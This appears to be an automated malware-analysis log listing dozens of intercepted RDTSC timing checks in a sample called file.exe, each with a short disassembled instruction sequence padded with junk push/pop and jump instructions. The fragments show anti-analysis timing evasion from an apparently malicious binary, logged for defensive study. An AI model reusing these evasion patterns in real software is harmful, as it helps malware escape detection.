Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A01D2 second address: 51A01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A01D8 second address: 51A01E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ch, A5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A01E9 second address: 51A01EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A01EF second address: 51A0258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45412F2584h 0x00000009 or cx, 0CC8h 0x0000000e jmp 00007F45412F257Bh 0x00000013 popfd 0x00000014 mov ecx, 5141E23Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e mov ebx, esi 0x00000020 pushfd 0x00000021 jmp 00007F45412F257Ch 0x00000026 or ch, 00000028h 0x00000029 jmp 00007F45412F257Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007F45412F257Bh 0x0000003b mov eax, 44BF9B0Fh 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0258 second address: 51A029E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4540B7FD1Bh 0x00000008 pushfd 0x00000009 jmp 00007F4540B7FD28h 0x0000000e and al, FFFFFFE8h 0x00000011 jmp 00007F4540B7FD1Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edi, 01D8BF56h 0x00000023 movsx ebx, cx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A029E second address: 51A0316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F45412F2587h 0x00000010 mov bx, cx 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F45412F2585h 0x0000001a add si, CCC6h 0x0000001f jmp 00007F45412F2581h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F45412F257Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0316 second address: 51A0407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushad 0x0000000d mov bh, cl 0x0000000f pushfd 0x00000010 jmp 00007F4540B7FD1Fh 0x00000015 xor al, 0000005Eh 0x00000018 jmp 00007F4540B7FD29h 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, 2CF6EE27h 0x00000024 popad 0x00000025 je 00007F45B2E6DFC6h 0x0000002b pushad 0x0000002c push ecx 0x0000002d jmp 00007F4540B7FD1Fh 0x00000032 pop ecx 0x00000033 popad 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b jmp 00007F4540B7FD22h 0x00000040 je 00007F45B2E6DFAAh 0x00000046 jmp 00007F4540B7FD20h 0x0000004b mov edx, dword ptr [esi+44h] 0x0000004e jmp 00007F4540B7FD20h 0x00000053 or edx, dword ptr [ebp+0Ch] 0x00000056 jmp 00007F4540B7FD20h 0x0000005b test edx, 61000000h 0x00000061 pushad 0x00000062 mov dx, cx 0x00000065 push eax 0x00000066 push edx 0x00000067 pushfd 0x00000068 jmp 00007F4540B7FD28h 0x0000006d and cl, FFFFFFA8h 0x00000070 jmp 00007F4540B7FD1Bh 0x00000075 popfd 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0407 second address: 51A040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 519079A second address: 51907A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51907A9 second address: 51907E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45412F2588h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51907E3 second address: 51907E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51907E9 second address: 51907FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45412F257Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51907FA second address: 51907FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51907FE second address: 5190821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45412F2586h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190821 second address: 5190827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190827 second address: 5190838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45412F257Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190838 second address: 51908D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4540B7FD1Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4540B7FD1Eh 0x0000001a sbb eax, 4B0FF818h 0x00000020 jmp 00007F4540B7FD1Bh 0x00000025 popfd 0x00000026 mov eax, 408263CFh 0x0000002b popad 0x0000002c and esp, FFFFFFF8h 0x0000002f jmp 00007F4540B7FD22h 0x00000034 xchg eax, ebx 0x00000035 jmp 00007F4540B7FD20h 0x0000003a push eax 0x0000003b jmp 00007F4540B7FD1Bh 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 call 00007F4540B7FD22h 0x00000049 pop ecx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51908D1 second address: 51908DD instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov si, dx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51908DD second address: 51908EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51908EB second address: 5190902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190902 second address: 51909C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F4540B7FD1Eh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 movzx ecx, dx 0x00000018 mov bx, CF0Eh 0x0000001c popad 0x0000001d mov ebx, 00000000h 0x00000022 pushad 0x00000023 mov bx, ax 0x00000026 jmp 00007F4540B7FD1Ch 0x0000002b popad 0x0000002c test esi, esi 0x0000002e pushad 0x0000002f mov si, 99EDh 0x00000033 popad 0x00000034 je 00007F45B2E7574Ah 0x0000003a pushad 0x0000003b push eax 0x0000003c push ebx 0x0000003d pop ecx 0x0000003e pop ebx 0x0000003f popad 0x00000040 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000047 pushad 0x00000048 pushad 0x00000049 call 00007F4540B7FD22h 0x0000004e pop eax 0x0000004f mov esi, edi 0x00000051 popad 0x00000052 mov al, dl 0x00000054 popad 0x00000055 mov ecx, esi 0x00000057 jmp 00007F4540B7FD26h 0x0000005c je 00007F45B2E75719h 0x00000062 jmp 00007F4540B7FD20h 0x00000067 test byte ptr [77516968h], 00000002h 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 mov si, bx 0x00000074 mov dx, C0BCh 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51909C8 second address: 5190A4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F45B35E7F4Eh 0x0000000f pushad 0x00000010 call 00007F45412F257Eh 0x00000015 mov dx, si 0x00000018 pop ecx 0x00000019 mov bx, 0352h 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 mov bx, AAAAh 0x00000026 mov cl, dl 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b movzx ecx, dx 0x0000002e call 00007F45412F2585h 0x00000033 mov di, cx 0x00000036 pop esi 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007F45412F257Ah 0x0000003e xchg eax, ebx 0x0000003f jmp 00007F45412F2580h 0x00000044 xchg eax, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov edx, 4C27B510h 0x0000004d mov ecx, edi 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190A4E second address: 5190A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4540B7FD1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190A75 second address: 5190A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190A7B second address: 5190AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F4540B7FD1Eh 0x00000011 push dword ptr [ebp+14h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4540B7FD27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190AB9 second address: 5190B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, di 0x00000012 pushfd 0x00000013 jmp 00007F45412F257Fh 0x00000018 jmp 00007F45412F2583h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190B3F second address: 5190B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4540B7FD20h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190B63 second address: 5190B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190B67 second address: 5190B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5190B6D second address: 5190BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45412F257Ch 0x00000009 adc ecx, 6F05E928h 0x0000000f jmp 00007F45412F257Bh 0x00000014 popfd 0x00000015 push esi 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esp, ebp 0x0000001c pushad 0x0000001d pushad 0x0000001e call 00007F45412F257Eh 0x00000023 pop esi 0x00000024 mov di, 3146h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b mov dx, D3A0h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0D12 second address: 51A0D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0A89 second address: 51A0ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45412F257Fh 0x00000009 sbb cx, 55FEh 0x0000000e jmp 00007F45412F2589h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0ABD second address: 51A0AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F4540B7FD1Ch 0x0000000d push eax 0x0000000e jmp 00007F4540B7FD1Bh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F4540B7FD26h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov cx, 5FB3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0AFD second address: 51A0B5F instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F45412F2584h 0x0000000c add si, 21B8h 0x00000011 jmp 00007F45412F257Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F45412F257Bh 0x00000022 sub esi, 1F52CB7Eh 0x00000028 jmp 00007F45412F2589h 0x0000002d popfd 0x0000002e mov cx, 31C7h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B60 second address: 5210B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B7F second address: 5210B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B83 second address: 5210B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B89 second address: 5210B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45412F257Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210B98 second address: 5210BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4540B7FD1Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BAE second address: 5210BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F45412F257Bh 0x0000000c and al, 0000001Eh 0x0000000f jmp 00007F45412F2589h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BE7 second address: 5210BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BEB second address: 5210BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BF1 second address: 5210BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BF7 second address: 5210BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BFB second address: 5210BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210BFF second address: 5210C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop eax 0x0000000f mov ecx, ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210C11 second address: 5210C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4540B7FD29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210C2E second address: 5210C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210C32 second address: 5210C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210C41 second address: 5210C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2582h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210895 second address: 5210944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4540B7FD1Fh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F4540B7FD29h 0x0000000f sub si, 4D26h 0x00000014 jmp 00007F4540B7FD21h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F4540B7FD1Eh 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 mov ch, dh 0x00000028 pushfd 0x00000029 jmp 00007F4540B7FD28h 0x0000002e and esi, 3E5E7128h 0x00000034 jmp 00007F4540B7FD1Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebx, eax 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 pushfd 0x00000043 jmp 00007F4540B7FD1Eh 0x00000048 adc esi, 3FC9A388h 0x0000004e jmp 00007F4540B7FD1Bh 0x00000053 popfd 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5210944 second address: 52109A8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F45412F2588h 0x00000008 sub esi, 03FD85E8h 0x0000000e jmp 00007F45412F257Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 mov ah, bh 0x00000019 pop esi 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F45412F2588h 0x00000026 adc al, 00000078h 0x00000029 jmp 00007F45412F257Bh 0x0000002e popfd 0x0000002f mov ch, 0Ah 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52109A8 second address: 52109BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4540B7FD21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52109BD second address: 52109CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52109CC second address: 52109E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0195 second address: 51B01AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45412F2586h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B01AF second address: 51B01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522003B second address: 5220060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45412F257Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220060 second address: 52200B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4540B7FD21h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007F4540B7FD1Ch 0x00000016 jmp 00007F4540B7FD22h 0x0000001b pop eax 0x0000001c push ebx 0x0000001d mov ecx, 33F6AF6Dh 0x00000022 pop eax 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200B8 second address: 52200BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200BC second address: 52200C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52200C2 second address: 5220161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45412F2583h 0x00000009 and esi, 5A3A194Eh 0x0000000f jmp 00007F45412F2589h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F45412F2588h 0x00000024 jmp 00007F45412F2585h 0x00000029 popfd 0x0000002a call 00007F45412F2580h 0x0000002f movzx esi, dx 0x00000032 pop ebx 0x00000033 popad 0x00000034 push dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F45412F2584h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220161 second address: 5220170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5220170 second address: 52201B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007F45412F2580h 0x0000000c and al, 00000018h 0x0000000f jmp 00007F45412F257Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 call 00007F45412F2579h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F45412F2585h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52201B9 second address: 52201BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52201BF second address: 52201C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522025D second address: 522028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 9841h 0x00000007 mov edi, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c movzx eax, al 0x0000000f pushad 0x00000010 mov cl, dl 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4540B7FD26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522028B second address: 522029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 522029A second address: 52202A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52202A0 second address: 52202A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
